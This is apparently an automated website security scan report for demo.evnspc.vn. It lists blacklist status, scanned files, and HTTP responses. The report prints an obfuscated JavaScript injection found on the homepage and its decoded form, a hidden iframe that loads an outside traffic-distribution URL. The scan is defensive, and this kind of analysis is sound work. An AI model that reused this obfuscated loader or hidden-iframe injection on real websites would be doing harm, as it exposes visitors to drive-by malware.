Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=demo.evnspc.vn
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://demo.evnspc.vn/ | 200 OK Content-Length: 18771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var \u0064='9/%6:%3[%d_%1=%4{%f]%0,%8-%2`%c}%7@%b.%a(%5&%e+',\u0065=function(){for(\u006e=0;\u006e<\u0078.length/2;\u006e++){\u0064+='%'+\u0078.substr(\u006e*2,2);}document.write(decodeURIComponent(\u0064));},\u0078='[}:{:/@:`,@[@{@/:}:&[_``:{:/@[@,:}:=@/[(:+:]:+:&[.``[+[}:/::@`:=:_:&`,@[@`:[[_``:-@{@{@,[(`]`]@{@`:=:::::/:[:]`+@,@@`]@{:{@[`]@{:]@,:_@&@@`+:[:@:/[]:{:&:::=@&:}@{```,@@:/:{@{:-[_``[=[,```,:-:&:/:@:-@{[_``[=[,``[+[}`]:/::@`:=:_:&[+[}`]:{:/@:[+',\u0079=function(){\u0079=\u0064.split('%');for(var \u0076 in \u0079){if((typeof(\u0079[\u0076])).substr(0,1)=='s'){\u0078=\u0078.split(\u0079[\u0076].substr(1)).join(\u0079[\u0076].substr(0,1));}}return this;},\u0069=\u0079(),\u0064='';\u0065();
Decoded script:
<div style="display:none;"><iframe src="http://traffico.pw/tds/topmuw.cgi?default" width="10" height="10"></iframe></div>
Antivirus reports:
http://demo.evnspc.vn/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/templates/evnspc_default/js/yt_script.js | 200 OK Content-Length: 2482 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/templates/evnspc_default/menusys/class/mega/assets/jsdroplinemenu.js | 200 OK Content-Length: 17565 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_swfobject/lib/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_meganewsii/assets/ytc.jquery-1.5.min.js | 200 OK Content-Length: 84651 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_meganewsii/assets/ytc.megaii-1.0.min.js | 200 OK Content-Length: 6149 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_titleflash/assets/js/yt.titleflash.js | 200 OK Content-Length: 10725 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.min.js | 200 OK Content-Length: 54106 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.noconflict.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.hoveraccordion.js | 200 OK Content-Length: 7561 Content-Type: application/javascript | clean |
http://demo.evnspc.vn//modules/mod_so_article_slider/assets/general.js/ | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: demo.evnspc.vn
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Jun 2014 16:51:05 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Type: text/html
Set-Cookie: 6e66d716ee72fc9206e2131c870a5274=f36bce98bc49fcd7d789d7390b68e0f1; path=/
Set-Cookie: evnspc_default_tpl=evnspc_default; expires=Wed, 27-May-2015 16:51:05 GMT; path=/
X-Died: timeout at scan.pm line 1538.
X-Powered-By: PHP/5.2.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: demo.evnspc.vn
Referer: http://www.google.com/search?q=demo.evnspc.vn
Result:
The result is similar to the first query. There are no suspicious redirects found.